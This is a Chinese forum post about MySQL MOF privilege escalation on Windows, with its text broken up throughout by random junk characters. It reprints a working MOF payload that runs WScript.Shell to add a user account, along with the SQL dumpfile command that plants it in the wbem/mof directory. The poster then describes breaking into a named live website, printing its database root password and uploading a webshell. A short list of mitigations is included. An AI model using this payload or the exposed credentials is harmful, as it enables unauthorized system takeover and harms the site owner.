Mysql mof扩展漏洞防范方法6 T$ o. e, O+ V! n# o
* w) x; t6 F8 B" k! _" ~6 R" {& i网上公开的一些利用代码:
/ t& Z. ^- w* ]" S. `# U
8 N4 X+ C+ h" h8 M4 i7 K% ]#pragma namespace(“\\\\.\\root\\subscription”)
! \/ H$ x+ i- v8 y! E# {
; C, m0 S2 M* O+ Z' Yinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
. ~2 r- o3 w* C* n; J4 J' D9 ~! v
& |$ z8 l" C j9 C) _ H ! C2 _" ^5 r" r' p
, Y) z; x6 ?5 ], h" M
2 [# e9 } H0 O. ^/ L1 v1 d- K. {2 Z9 C) q
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;- }+ l) p3 O. @
从上面代码来看得出解决办法:* t8 c: w/ y! e
4 |, O( e, G: z8 p# j$ f1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数: S' q+ f/ i8 G. t0 b0 R7 U
9 e* i) Q9 q1 {2、禁止使用”WScript.Shel”组件6 Q# ^4 q9 w0 f% E$ V+ b/ B
8 I- K( N- F) ^* J" B* A4 J
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER+ z8 b( o) b: {# i) @5 x5 t
; X8 y1 G* D' }1 h$ l# U当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下) G$ l/ z+ {0 p5 J& I3 Y% b7 _ Y
! _' J7 f3 l$ A事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
9 f: s. }2 M( q- I2 w+ I8 m
; g) L6 l' }! O但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容$ U/ [5 C8 D% Y! k
/ o7 ]# N6 Z' y' [1 w V8 q
看懂了后就开始练手吧4 D8 T5 O6 `! P' H4 f( [1 q
% }0 ^5 r4 }+ r' U, O
http://www.webbmw.com/config/config_ucenter.php 一句话 a) U* Z. Z9 H7 K5 @4 ^" J
7 g( E, q# h4 y$ u) t
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
, H! q# z- ~) d; J; _
8 w% k: y. R# D1 g3 O0 U于是直接用菜刀开搞) x* |7 o6 l R8 j
Z$ \! m9 ]& o; X2 L1 s! n+ N
上马先: q w T' F1 O8 L* Z. ?
2 _& S( U l4 @2 n既然有了那些账号 之类的 于是我们就执行吧…….
8 i6 T5 Y* \" S
+ U& q, J0 p8 u# U0 V" j小小的说下
) c# m0 l& _2 `6 E; T5 Q; g. Z, y% G/ `6 k# b" ^$ B9 V( D% T+ @
在这里第1次执行未成功 原因未知
/ x3 }7 K, y# R3 ?! j5 w) X* s) W4 v2 q r. W2 ]" S# \
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
' |* L5 P/ T* B+ v/ m! N2 y6 T- L2 f
#pragma namespace(“\\\\.\\root\\subscription”)/ a1 L! h) J) c% t5 i4 ^5 X" S
0 |3 B; y# b2 a7 X" n8 ?instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };5 c& r5 l- |; t/ ~
' w7 h0 @3 d1 k8 U- m我是将文件放到C:\WINDOWS\temp\1.mof
0 L1 E; z5 O& T5 e+ o: O
* _% } W+ j& E3 k4 [+ {1 h所以我们就改下执行的代码
& {3 x" q% i) T! S
( U' @) ]* w2 T5 z$ x7 }. tselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;! o m. M4 a+ Q' F+ ~6 O
+ K2 e9 o/ F6 T0 b! d, Y$ ^
) F% [9 a$ y ]( a0 t |, z
" x% d4 f0 R% C0 k7 j/ Q9 O但是 你会发现账号还是没有躺在那里。。' n7 f* B) R0 `( I( k
4 P, P2 A& t0 W5 k
于是我就感觉蛋疼; v" g5 H% f- U* I" }" X5 W
! a* f0 i9 O- L( m
就去一个一个去执行 但是执行到第2个 mysql时就成功了………
& D- W5 S/ j: M8 X3 f B# w; c- e0 ~0 ~8 f5 N% h
; ~0 F2 ] i. e! _
/ C7 J# ?# m+ Y, s* x. Y但是其他库均不成功…
) I' |% |; ]" Z8 l* T. X2 A3 q+ G2 |
" V) [0 Y8 \& S* t; x" t: }2 }, P我就很费解呀 到底为什么不成功求大牛解答…
: t4 g3 X( F, Q
! B) K. P: l# y( {5 s' C' s, T& j5 W, V2 `" |/ m
! Q( f' C7 o9 c; N6 {' A
|
发表于 2013-1-4 19:49:49
收藏
支持
反对